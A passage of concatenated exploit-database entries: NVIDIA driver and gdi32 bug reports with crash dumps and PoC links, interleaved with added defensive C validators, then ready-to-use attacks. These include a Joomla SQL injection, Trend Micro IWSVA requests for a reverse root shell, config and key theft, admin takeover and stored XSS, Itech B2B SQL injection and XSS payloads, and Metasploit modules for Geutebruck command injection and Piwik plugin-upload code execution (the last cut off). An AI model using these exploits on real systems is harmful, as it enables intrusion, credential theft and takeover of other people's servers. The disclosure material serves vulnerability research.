check only calls a debug logging function and does not stop the memcpy that
follows. Second, the |size| field from the header is not checked against the
actual size of the data (the calling function checks it as well, but once
again only by calling do_debug_thingo()).
This lets an attacker specify an arbitrary length for the copy, as well as
an arbitrary 32-bit offset to copy from, leading to pool memory corruption.
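An added C example, not from the report or from NVIDIA's driver, of the validation the decompiled code skips: the user-supplied length and header offset are checked against the real buffer size before any copy, and a failure aborts the submit instead of only logging. The header layout, the 0x4E8 (1256) destination offset and the 8 * len multiplier are taken from the report; the 2048-byte buffer, the return codes and the helper names are this example's assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NV_PRIV_COPY_OFFSET 0x4E8   /* 1256: where the shifted data lands (from the report) */

typedef struct {                    /* NvPrivateHeader, as laid out in the report */
    uint32_t magic;
    uint16_t unknown_4;
    uint16_t unknown_6;
    uint32_t unknown_8;
    uint32_t size;                  /* user-controlled source offset */
} NvPrivateHeader;

enum { NV_OK = 0, NV_ERR_SMALL = 1, NV_ERR_LEN = 2, NV_ERR_SRC = 3 };

/* The reported pattern: the bound is evaluated, but a failure only logs, so the
 * caller still does memcpy(priv + 0x4E8, priv + hdr->size, 8 * len). Returns the
 * byte count that copy would use; shown for contrast, never copy on it. */
size_t vulnerable_shift_bytes(size_t priv_size, uint32_t len)
{
    size_t bytes = 8u * (size_t)len;
    if (bytes >= priv_size - NV_PRIV_COPY_OFFSET)
        fprintf(stderr, "debug: private data too large (not enforced)\n");
    return bytes;
}

/* Hardened validation: reject, do not log, when any user-controlled quantity
 * does not fit. Checks that the buffer holds the header and the destination
 * region, that 8 * len cannot wrap, that [0x4E8, 0x4E8 + 8*len) lies inside
 * the buffer, and that the source [hdr.size, hdr.size + 8*len) does too. */
int validate_shift(const uint8_t *priv, size_t priv_size, uint32_t len, size_t *out_bytes)
{
    NvPrivateHeader hdr;
    size_t bytes;

    if (priv_size < sizeof hdr || priv_size < NV_PRIV_COPY_OFFSET)
        return NV_ERR_SMALL;
    memcpy(&hdr, priv, sizeof hdr);            /* no alignment assumptions on priv */
    if ((size_t)len > SIZE_MAX / 8)
        return NV_ERR_LEN;
    bytes = 8u * (size_t)len;
    if (bytes > priv_size - NV_PRIV_COPY_OFFSET)
        return NV_ERR_LEN;                     /* destination region overruns the buffer */
    if ((size_t)hdr.size > priv_size || bytes > priv_size - (size_t)hdr.size)
        return NV_ERR_SRC;                     /* source region overruns the buffer */
    *out_bytes = bytes;
    return NV_OK;
}

/* Constructed test input: a 2048-byte private-data buffer whose header.size and
 * len are chosen by the caller. Returns validate_shift()'s verdict. */
int check_submit(uint32_t hdr_size, uint32_t len)
{
    uint8_t priv[2048];
    NvPrivateHeader hdr = { 0x4E564944u, 0, 0, 0, hdr_size };   /* arbitrary magic */
    size_t bytes = 0;
    memset(priv, 0, sizeof priv);
    memcpy(priv, &hdr, sizeof hdr);
    return validate_shift(priv, sizeof priv, len, &bytes);
}

int main(void)
{
    printf("len=16, size=16        -> %d (expect %d)\n", check_submit(16, 16), NV_OK);
    printf("len=0x41414141         -> %d (expect %d)\n", check_submit(16, 0x41414141u), NV_ERR_LEN);
    printf("size=0xFFFFFFF0, len=1 -> %d (expect %d)\n", check_submit(0xFFFFFFF0u, 1), NV_ERR_SRC);
    printf("vulnerable path would memcpy %zu bytes for len=0x41414141\n",
           vulnerable_shift_bytes(2048, 0x41414141u));
    return 0;
}
```

The source and destination regions overlap inside one buffer in the original, so a corrected driver would also need memmove rather than memcpy; the example only decides whether a copy is permitted at all.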
Crashing context with PoC (Win 10 x64, driver version 375.95):
PAGE_FAULT_IN_NONPAGED_AREA (50)
...
rax=0000000000000008 rbx=0000000000000000 rcx=ffffb2087fe8f4f0
rdx=0000000041413c59 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8035fc15b00 rsp=ffffd88179edd1a8 rbp=0000000000000080
r8=00000000020a0a08 r9=0000000000105050 r10=0000000000000000
r11=ffffb2087fe8f4f0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na po nc
nvlddmkm+0x5e5b00:
fffff803`5fc15b00 f30f6f040a movdqu xmm0,xmmword ptr [rdx+rcx] ds:ffffb208`c12a3149=????????????????????????????????
Resetting default scope
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41365.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=985
The DxgkDdiEscape handler for 0x100008b accepts a user supplied size as the
limit for a loop, leading to OOB reads and writes.
The supplied PoC passes an invalid size of 0x41414141, which causes a crash in:
__int64 sub_30A500(__int64 a1, __int64 a2, _DWORD *ptr, unsigned int user_supplied_size)
{
  __int64 i; // r11@2
  if ( user_supplied_size )
  {
    i = user_supplied_size;
    do
    {
      if ( *ptr == 3 || (unsigned int)(*ptr - 9) <= 1 )
        *ptr = 0;
      ptr += 3;
      --i;
    }
    while ( i );
  }
  // (remainder of the decompiled function omitted)
Crashing context on Win 10 x64, driver version 375.70:
TRAP_FRAME: ffffd000266219e0 -- (.trap 0xffffd000266219e0)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=00000000fffffff7 rbx=0000000000000000 rcx=ffffe000d6315000
rdx=ffffe000d691b000 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8010e34a50b rsp=ffffd00026621b78 rbp=ffffe000d691b000
r8=ffffd000266228a8 r9=0000000041414141 r10=ffffd00026623004
r11=00000000414140a4 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
nvlddmkm+0x2fa50b:
fffff801`0e34a50b 418b02 mov eax,dword ptr [r10] ds:ffffd000`26623004=????????
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41364.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=992
In issue #757, I described multiple bugs related to the handling of DIBs (Device Independent Bitmaps) embedded in EMF records, as implemented in the user-mode Windows GDI library (gdi32.dll). As a quick reminder, the DIB-embedding records follow a common scheme: they include four fields, denoting the offsets and lengths of the DIB header and DIB data (named offBmiSrc, cbBmiSrc, offBitsSrc, cbBitsSrc). A correct implementation should verify that:
1) cbBmiSrc is within expected bounds, accounting for the DIB header, color palette etc.
2) the (offBmiSrc, offBmiSrc + cbBmiSrc) region resides within the record buffer's area.
3) cbBitsSrc is within expected bounds, and in particular that it is larger than or equal to the expected number of bitmap bytes.
4) the (offBitsSrc, offBitsSrc + cbBitsSrc) region resides within the record buffer's area.
In the previous bug, I listed various combinations of missing checks in at least 10 different records:
- EMR_ALPHABLEND
- EMR_BITBLT
- EMR_MASKBLT
- EMR_PLGBLT
- EMR_STRETCHBLT
- EMR_TRANSPARENTBLT
- EMR_SETDIBITSTODEVICE
- EMR_STRETCHDIBITS
- EMR_CREATEMONOBRUSH
- EMR_EXTCREATEPEN
As part of MS16-074, some of the bugs were indeed fixed, such as the EMR_STRETCHBLT record, which the original proof-of-concept image relied on. However, we've discovered that not all of the DIB-related problems are gone. For instance, the implementation of EMR_SETDIBITSTODEVICE (residing in the MRSETDIBITSTODEVICE::bPlay function) still doesn't enforce condition #3. As a result, it is possible to disclose uninitialized or out-of-bounds heap bytes via pixel colors, in Internet Explorer and other GDI clients which allow the extraction of displayed image data back to the attacker.
The proof-of-concept file attached here consists of a single EMR_SETDIBITSTODEVICE record (excluding the header/EOF records), which originally contained a 1x1 bitmap. The dimensions of the DIB were then manually altered to 16x16, without adding any more actual image data. As a consequence, the 16x16/24bpp bitmap is now described by just 4 bytes, which is good for only a single pixel. The remaining 255 pixels are drawn based on junk heap data, which may include sensitive information, such as private user data or information about the virtual address space. I have confirmed that the vulnerability reproduces both locally in Internet Explorer, and remotely in Office Online, via a .docx document containing the specially crafted EMF file.
It is strongly advised to perform a careful audit of all EMF record handlers responsible for dealing with DIBs, in order to make sure that each of them correctly enforces all four conditions necessary to prevent invalid memory access (and subsequent memory disclosure) while processing the bitmaps.
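The four conditions above, written out as a validator. This is an added example and not gdi32's code: it uses the report's field names (offBmiSrc, cbBmiSrc, offBitsSrc, cbBitsSrc), accepts only a 40-byte BITMAPINFOHEADER with BI_RGB compression, and the struct and function names are ours. The constructed 16x16 record with only 4 bytes of pixel data reproduces the shape of the PoC and fails condition 3:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The four fields every DIB-embedding EMF record carries, as named in the
 * report; offsets are relative to the start of the record. Struct name is ours. */
typedef struct {
    uint32_t offBmiSrc;
    uint32_t cbBmiSrc;
    uint32_t offBitsSrc;
    uint32_t cbBitsSrc;
} DibRefs;

#define BIH_SIZE 40u   /* sizeof(BITMAPINFOHEADER) */
#define BI_RGB   0u

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* True when [off, off + len) lies inside a record of rec_len bytes; the
 * subtraction form cannot overflow the way off + len could. */
static int region_in_record(uint32_t off, uint32_t len, uint32_t rec_len) {
    return off <= rec_len && len <= rec_len - off;
}

/* Returns 0 when all four conditions from the report hold, otherwise the
 * number (1-4) of the first condition that fails. */
int validate_dib_record(const uint8_t *rec, uint32_t rec_len, const DibRefs *d) {
    if (!region_in_record(d->offBmiSrc, d->cbBmiSrc, rec_len)) return 2;
    if (d->cbBmiSrc < BIH_SIZE) return 1;
    const uint8_t *bih = rec + d->offBmiSrc;
    uint32_t biSize        = rd32(bih);
    int32_t  biWidth       = (int32_t)rd32(bih + 4);
    int32_t  biHeight      = (int32_t)rd32(bih + 8);
    uint32_t biBitCount    = rd32(bih + 12) >> 16;   /* biPlanes occupies the low half */
    uint32_t biCompression = rd32(bih + 16);
    uint32_t biClrUsed     = rd32(bih + 32);
    if (biSize != BIH_SIZE || biCompression != BI_RGB) return 1;
    if (biWidth <= 0 || biHeight == 0 || biHeight == INT32_MIN) return 1;
    if (biBitCount != 1 && biBitCount != 4 && biBitCount != 8 &&
        biBitCount != 16 && biBitCount != 24 && biBitCount != 32) return 1;
    /* 1: header plus colour table must fit inside cbBmiSrc */
    uint64_t palette_bytes = 0;
    if (biBitCount <= 8) {
        uint32_t max_colors = 1u << biBitCount;
        uint32_t colors = biClrUsed ? biClrUsed : max_colors;
        if (colors > max_colors) return 1;
        palette_bytes = (uint64_t)colors * 4;
    }
    if (BIH_SIZE + palette_bytes > d->cbBmiSrc) return 1;
    /* 3: cbBitsSrc must cover width x height at this depth (rows padded to 4 bytes) */
    uint64_t stride = (((uint64_t)biWidth * biBitCount + 31) / 32) * 4;
    uint64_t rows   = biHeight < 0 ? (uint64_t)(-(int64_t)biHeight) : (uint64_t)biHeight;
    if (stride > UINT64_MAX / rows || stride * rows > d->cbBitsSrc) return 3;
    /* 4: the pixel region must lie inside the record */
    if (!region_in_record(d->offBitsSrc, d->cbBitsSrc, rec_len)) return 4;
    return 0;
}

static void wr32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Builds a constructed record: a 24bpp BITMAPINFOHEADER at offset 0 followed by
 * actual_bits bytes of pixel data, while the record *claims* claimed_bits.
 * w = h = 16 with 4 actual and 4 claimed bytes reproduces the PoC's shape. */
int check_24bpp_record(int32_t w, int32_t h, uint32_t actual_bits, uint32_t claimed_bits) {
    uint8_t rec[BIH_SIZE + 64];
    if (actual_bits > 64) return -1;
    memset(rec, 0, sizeof rec);
    wr32(rec,      BIH_SIZE);
    wr32(rec + 4,  (uint32_t)w);
    wr32(rec + 8,  (uint32_t)h);
    wr32(rec + 12, 1u | (24u << 16));   /* biPlanes = 1, biBitCount = 24 */
    wr32(rec + 16, BI_RGB);
    DibRefs d = { 0, BIH_SIZE, BIH_SIZE, claimed_bits };
    return validate_dib_record(rec, BIH_SIZE + actual_bits, &d);
}

int main(void) {
    printf("1x1, 4 bytes:                 %d\n", check_24bpp_record(1, 1, 4, 4));
    printf("16x16, 4 bytes (PoC shape):   %d\n", check_24bpp_record(16, 16, 4, 4));
    printf("16x16, claims 768, holds 4:   %d\n", check_24bpp_record(16, 16, 4, 768));
    return 0;
}
```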
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41363.zip
# # # # #
# Exploit Title: Joomla! Component JoomBlog v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomblog
# Date: 15.02.2017
# Vendor Homepage: http://joomplace.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/authoring-a-content/blog/joomblog/
# Demo: http://demo30.joomplace.com/our-products/joomblog/
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomblog&task=tag&tag=Ihsan_Sencan[SQL]
# # # # #
# Exploit Title: [Trend Micro Interscan Web Security Virtual Appliance (IWSVA) 6.5.x Multiple Vulnerabilities]
# Date: [28/11/2016]
# Exploit Author: [SlidingWindow] , Twitter: @Kapil_Khot
# Vendor Homepage: [http://www.trendmicro.com/us/enterprise/network-security/interscan-web-security/virtual-appliance/]
# Version: [Tested on IWSVA version 6.5-SP2_Build_Linux_1707 and prior versions in 6.5.x series. Older versions may also be affected]
# Tested on: [IWSVA version 6.5-SP2_Build_Linux_1707]
# CVE : [CVE-2016-9269, CVE-2016-9314, CVE-2016-9315, CVE-2016-9316]
# Vendor Security Bulletin: https://success.trendmicro.com/solution/1116672
==================
#Product:-
==================
Trend Micro ‘InterScan Web Security Virtual Appliance (IWSVA)’ is a secure web gateway that combines application control with zero-day exploit detection, advanced anti-malware and ransomware scanning, real-time web reputation, and flexible URL filtering to provide superior Internet threat protection.
==================
#Vulnerabilities:-
==================
Remote Command Execution, Sensitive Information Disclosure, Privilege Escalation and Stored Cross-Site-Scripting (XSS)
========================
#Vulnerability Details:-
========================
#1. Remote Command Execution Vulnerability (CVE-2016-9269):-
The Trend Micro IWSVA is managed through a web-based management console that listens on port 1812. A least-privileged user who can only run reports is able to execute commands on the server as root and obtain a root shell.
Proof of Concept:-
a. Download the patch from here.
b. Edit the 'startgate_patch_apply.sh' and add your Kali machine ip to get reverse shell.
c. Calculate the MD5 hash of 'stargate_patch.tgz'
md5sum stargate_patch.tgz
d. Update the 'MD5SUM.txt' with new hash.
e. Listen on port 443 on your Kali machine.
f. Upload the patch to the target server:
http://target_server:1812/servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload
g. You should have a root shell now.
#2. Sensitive Information Disclosure Vulnerability (CVE-2016-9314):-
The web management console allows administrators to back up the current configuration of the appliance and download it to their local machine. A low-privileged user can abuse the ‘ConfigBackup’ functionality to create such a backup and download it. The backup file contains sensitive information such as the passwd/shadow files, RSA certificates, private keys and the default passphrase.
Exploitation:-
A. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=export HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&op=save&uploadfile=&beFullyOrPartially=0
B. Send this POST request to download the backup file from server:
POST /servlet/com.trend.iwss.gui.servlet.ConfigBackup?action=download HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&op=2&ImEx_success=1&pkg_name=%2Fvar%2Fiwss%2Fmigration%2Fexport%2FIWSVA6.5-SP2_Config.tar%0D%0A&backup_return=
#3. Privilege Escalation Vulnerability (CVE-2016-9315):-
A. Change Master Admin's password:
i. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&accountop=review&allaccount=admin&allaccount=hacker2&allaccount=hacker4&allaccount=hacker&allaccount=test&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=abc123&PASS2=abc123&description=Master+Administrator&role_select=0&roleid=0
B. Add a new administrator account 'hacker'
i. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&accountop=add&allaccount=admin&accountType=local&accountnamelocal=hacker&accounttype=0&password_changed=true&PASS1=pass1234&PASS2=pass1234&description=hackerUser&role_select=1&roleid=1
#4. Stored Cross-Site-Scripting Vulnerability (CVE-2016-9316):-
i. Send following POST request to the target:
(Replace JSESSIONID and CSRFGuardToken with the ones from your current low privileged user's session)
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: <Target_IP>:1812
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=<Low_Privileged_Users_Session_ID>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 292
CSRFGuardToken=<Low_Privileged_Users_CSRF_TOKEN>&accountop=add&allaccount=admin&accountType=local&accountnamelocal=hacker4"><script>alert(111)</script>&accounttype=0&password_changed=true&PASS1=pass1234&PASS2=pass1234&description=hackerUser4"><script>alert(111)</script>&role_select=1&roleid=1
ii. The script executes when admin visits the ‘Login Accounts’ page.
#Vulnerability Disclosure Timeline:
28/10/2016: First email to disclose the vulnerability to the Trend Micro incident response team
10/11/2016: Second email to ask for acknowledgment
15/11/2016: Acknowledgment from the Trend Micro incident response team confirming receipt of the email and stating that the vulnerability is under investigation
15/11/2016: CVE Mitre assigned CVE-2016-9269, CVE-2016-9314, CVE-2016-9315 and CVE-2016-9316 for these vulnerabilities.
24/11/2016: Trend Micro incident response team provided a patch for testing.
25/11/2016: Acknowledgement sent to Trend Micro confirming the fix.
01/12/2016: Third email to ask for remediation status
02/12/2016: Trend Micro incident response team responded stating that the fix will be released by the end of December 2016.
21/12/2016: Fourth email to ask for remediation status
21/12/2016: Trend Micro released the patch for English version.
21/12/2016: Trend Micro incident response team responded stating that the patch for Japanese version will be released in February 2017.
14/02/2017: Trend Micro releases Security Advisory. Link: https://success.trendmicro.com/solution/1116672
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Geutebruck testaction.cgi Remote Command Execution',
      'Description'    => %q{
        This module exploits an arbitrary command execution vulnerability. The
        vulnerability exists in the /uapi-cgi/viewer/testaction.cgi page and allows an
        anonymous user to execute arbitrary commands with root privileges.
        Firmware <= 1.11.0.12 are concerned.
        Tested on 5.02024 G-Cam/EFD-2250 running 1.11.0.12 firmware.
      },
      'Author'         =>
        [
          'Davy Douhine',   # CVE-2017-5173 (RCE) and metasploit module
          'Florent Montel', # CVE-2017-5174 (Authentication bypass)
          'Frederic Cikala' # CVE-2017-5174 (Authentication bypass)
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-5173' ],
          [ 'CVE', '2017-5174' ],
          [ 'URL', 'http://geutebruck.com' ],
          [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-045-02' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Space'       => 1024,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic netcat bash',
            }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 16 2016'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/testaction.cgi']),
      ], self.class)
  end

  def exploit
    uri = normalize_uri(target_uri.path)
    print_status("#{rhost}:#{rport} - Attempting to exploit...")
    command = payload.encoded

    # Single unauthenticated POST to testaction.cgi; the payload rides in the 'ip' parameter.
    res = send_request_cgi(
      {
        'uri'       => uri,
        'method'    => 'POST',
        'vars_post' => {
          'type' => "ip",
          'ip'   => "eth0 1.1.1.1;#{command}",
        },
      })
  end
end
Exploit Title : Itech scripts B2B Script v4.29 - Multiple Vulnerabilities
Google Dork : -
Date : 12/02/2017
Exploit Author : Marc Castejon <marc@silentbreach.com>
Vendor Homepage : http://itechscripts.com/b2b-script/
Software Link: http://b2b.itechscripts.com
Type : webapps
Platform: PHP
Version: 4.29
Software Price and Demo : $250
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: keywords
Method: GET
Payload: ') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: rctyp
Method: GET
Payload: ') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
-----------------------------------------------
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: rctyp
Method: GET
Payload: <img src=i onerror=prompt(1)>
-----------------------------------------------
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/search.php
Vulnerable Parameters: keyword
Method: GET
Payload: <img src=i onerror=prompt(1)>
------------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/catcompany.php
Vulnerable Parameters: token
Method: GET
Payload: ') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
-----------------------------------------------
Type: Error Based Sql Injection
Vulnerable URL:http://localhost/[PATH]/buyleads-details.php
Vulnerable Parameters: id
Method: GET
Payload: ') UNION ALL SELECT NULL,CONCAT(0x7171717671,0x5055787a7374645446494e58566e66484f74555968674d504262564348434b70657a4c45556b534e,0x716a626271)#
-----------------------------------------------
Type: Stored XSS
Vulnerable URL:http://localhost/[PATH]/ajax-file/sendMessage.php
Vulnerable Parameters: msg_message
Method: POST
Payload: <img src=i onerror=prompt(1)>
------------------------------------------------
Type: Stored XSS
Vulnerable URL:http://localhost/[PATH]/my-contactdetails.php
Vulnerable Parameters: fname
Method: POST
Payload: <img src=i onerror=prompt(1)>
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Piwik Superuser Plugin Upload',
      'Description'    => %q{
        This module will generate a plugin, pack the payload into it
        and upload it to a server running Piwik. Superuser Credentials are
        required to run this module. This module does not work against Piwik 1
        as there is no option to upload custom plugins.
        Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'FireFart' # Metasploit module
        ],
      'References'     =>
        [
          [ 'URL', 'https://firefart.at/post/turning_piwik_superuser_creds_into_rce/' ]
        ],
      'DisclosureDate' => 'Feb 05 2017',
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Piwik', {}]],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path of the Piwik installation', '/']),
        OptString.new('USERNAME', [true, 'The Piwik username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The Piwik password to authenticate with'])
      ], self.class)
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  def normalized_index
    normalize_uri(target_uri, 'index.php')
  end

  # The "About Piwik" block on the Feedback page carries the version string;
  # its markup changed between releases, hence several regexes.
  def get_piwik_version(login_cookies)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalized_index,
      'cookie' => login_cookies,
      'vars_get' => {
        'module' => 'Feedback',
        'action' => 'index',
        'idSite' => '1',
        'period' => 'day',
        'date' => 'yesterday'
      }
    })

    piwik_version_regexes = [
      /<title>About Piwik ([\w\.]+) -/,
      /content-title="About Piwik ([\w\.]+)"/,
      /<h2 piwik-enriched-headline\s+feature-name="Help"\s+>About Piwik ([\w\.]+)/m
    ]

    if res && res.code == 200
      for r in piwik_version_regexes
        match = res.body.match(r)
        if match
          return match[1]
        end
      end
    end

    # check for Piwik version 1
    # the logo.svg is only available in version 1
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri, 'themes', 'default', 'images', 'logo.svg')
    })
    if res && res.code == 200 && res.body =~ /<!DOCTYPE svg/
      return "1.x"
    end

    nil
  end

  # The system check page is only rendered for superusers.
  def is_superuser?(login_cookies)
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalized_index,
      'cookie' => login_cookies,
      'vars_get' => {
        'module' => 'Installation',
        'action' => 'systemCheckPage'
      }
    })
    if res && res.body =~ /You can't access this resource as it requires a 'superuser' access/
      return false
    elsif res && res.body =~ /id="systemCheckRequired"/
      return true
    else
      return false
    end
  end

  # Builds a minimal Piwik plugin (plugin.json + one PHP class) whose
  # install() hook carries the payload, and returns it as a zip archive.
  def generate_plugin(plugin_name)
    plugin_json = %Q|{
  "name": "#{plugin_name}",
  "description": "#{plugin_name}",
  "version": "#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}",
  "theme": false
}|

    plugin_script = %Q|<?php
namespace Piwik\\Plugins\\#{plugin_name};

class #{plugin_name} extends \\Piwik\\Plugin {
  public function install()
  {
    #{payload.encoded}
  }
}
|

    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
    zip.add_file("#{plugin_name}/plugin.json", plugin_json)
    zip.pack
  end

  def exploit
    print_status('Trying to detect if target is running a supported version of piwik')
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalized_index
    })
    if res && res.code == 200 && res.body =~ /<meta name="generator" content="Piwik/
      print_good('Detected Piwik installation')
    else
      fail_with(Failure::NotFound, 'The target does not appear to be running a supported version of Piwik')
    end

    print_status("Authenticating with Piwik using #{username}:#{password}...")
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalized_index,
      'vars_get' => {
        'module' => 'Login',
        'action' => 'index'
      }
    })
    login_nonce = nil
    if res && res.code == 200
      match = res.body.match(/name="form_nonce" id="login_form_nonce" value="(\w+)"\/>/)
      if match
        login_nonce = match[1]
      end
    end
    fail_with(Failure::UnexpectedReply, 'Can not extract login CSRF token') if login_nonce.nil?
    cookies = res.get_cookies

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalized_index,
      'cookie' => cookies,
      'vars_get' => {
        'module' => 'Login',
        'action' => 'index'
      },
      'vars_post' => {
        'form_login' => "#{username}",
        'form_password' => "#{password}",
        'form_nonce' => "#{login_nonce}"
      }
    })
    if res && res.redirect? && res.redirection
      # update cookies
      cookies = res.get_cookies
    else
      # failed login responds with code 200 and renders the login form
      fail_with(Failure::NoAccess, 'Failed to authenticate with Piwik')
    end
    print_good('Authenticated with Piwik')

    print_status("Checking if user #{username} has superuser access")
    superuser = is_superuser?(cookies)
    if superuser
      print_good("User #{username} has superuser access")
    else
